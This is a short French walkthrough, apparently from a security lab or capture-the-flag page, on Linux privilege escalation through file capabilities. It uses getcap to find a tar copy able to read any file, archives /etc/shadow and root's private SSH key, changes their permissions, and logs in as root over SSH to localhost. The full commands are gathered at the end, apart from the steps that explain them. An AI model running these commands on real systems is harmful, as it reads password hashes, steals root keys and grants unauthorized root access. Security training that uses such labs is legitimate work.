getcap -r / 2>/dev/null
Utilisez la commande getcap pour explorer les capacités du système. Identifiez une capacité qui permet de lister tous les documents du système.
getcap
Capture du fichier /etc/shadow avec tar
Créez un dossier dans le répertoire /tmp et incluez le fichier /etc/shadow avec la commande suivante :
Décompressez l'archive dans le répertoire /tmp. En tant que créateur, modifiez les droits pour pouvoir visualiser le contenu du fichier /etc/shadow.
Capture de la clé privée .ssh avec tar
Capturez la clé privée .ssh de l'utilisateur root avec la commande suivante :
Connexion SSH avec la clé privée capturée:
Utilisez la clé privée capturée pour établir une connexion SSH à l'utilisateur root sur la machine locale.
Mis à jour il y a 1 an
tarS -cvf shadow.tar /etc/shadow
tar -xvf /tmp/shadow.tar -C /tmp/ chmod 644 /tmp/etc/shadow
tarS -cvf id_rsa.tar /root/.ssh/id_rsa
ssh -i id_rsa root@localhost -p 2082
